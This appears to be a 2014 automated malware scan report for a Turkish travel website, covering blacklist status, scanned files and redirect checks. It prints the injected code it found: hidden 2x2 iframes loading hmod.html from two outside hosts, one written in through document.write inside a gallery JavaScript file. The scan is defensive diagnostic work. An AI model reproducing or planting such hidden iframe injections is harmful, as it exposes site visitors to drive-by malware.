Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=neferturizm.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://neferturizm.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://neferturizm.com/ | 200 OK Content-Length: 14383 Content-Type: text/html | clean |
http://neferturizm.com/jquery-1.4.3.min.js | 200 OK Content-Length: 77746 Content-Type: application/x-javascript | clean |
http://neferturizm.com/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1279 Content-Type: application/x-javascript | clean |
http://neferturizm.com/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15624 Content-Type: application/x-javascript | clean |
http://neferturizm.com/2013_nefer.jpg | 200 OK Content-Length: 300424 Content-Type: image/jpeg | clean |
http://neferturizm.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://neferturizm.com/ozbekistan.asp | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://neferturizm.com/kudusgezi.asp | 200 OK Content-Length: 11980 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html> | ||
http://neferturizm.com/jquery.min.js | 200 OK Content-Length: 54075 Content-Type: application/x-javascript | clean |
http://neferturizm.com/jquery.galleria.js | 200 OK Content-Length: 14020 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ var $$; $$ = $.fn.galleria = function($options) { if (!$$.hasCSS()) { return false; } $.historyInit($$.onPageLoad); var $defaults = { insert : '.galleria_container', history : true, clickNext : true, onImage : function(image,caption,thumb) {}, onThumb : function(thumb) {} }; var $opts = $.extend($defaults, $options); for (var i in $opts) { $.galleria[i] document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speedfreak.es/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://speedfreak.es/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speedfreak.es/hmod.html> | ||
http://neferturizm.com/2009hac.asp | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://neferturizm.com/umre.asp | 200 OK Content-Length: 75609 Content-Type: text/html | clean |
http://neferturizm.com/ucakbileti.asp | 200 OK Content-Length: 10754 Content-Type: text/html | clean |
http://neferturizm.com/iletisim.asp | 200 OK Content-Length: 12230 Content-Type: text/html | clean |
http://neferturizm.com/basin.asp | 200 OK Content-Length: 9991 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: neferturizm.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Aug 2014 12:20:12 GMT
Server: Microsoft-IIS/6.0
Content-Length: 14383
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSACCCRSR=DHHPLNDCBKMINELJFAPICBNL; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...14383 bytes of data.
GET / HTTP/1.1
Host: neferturizm.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Aug 2014 12:20:12 GMT
Server: Microsoft-IIS/6.0
Content-Length: 14383
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSACCCRSR=DHHPLNDCBKMINELJFAPICBNL; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...14383 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: neferturizm.com
Referer: http://www.google.com/search?q=neferturizm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: neferturizm.com
Referer: http://www.google.com/search?q=neferturizm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.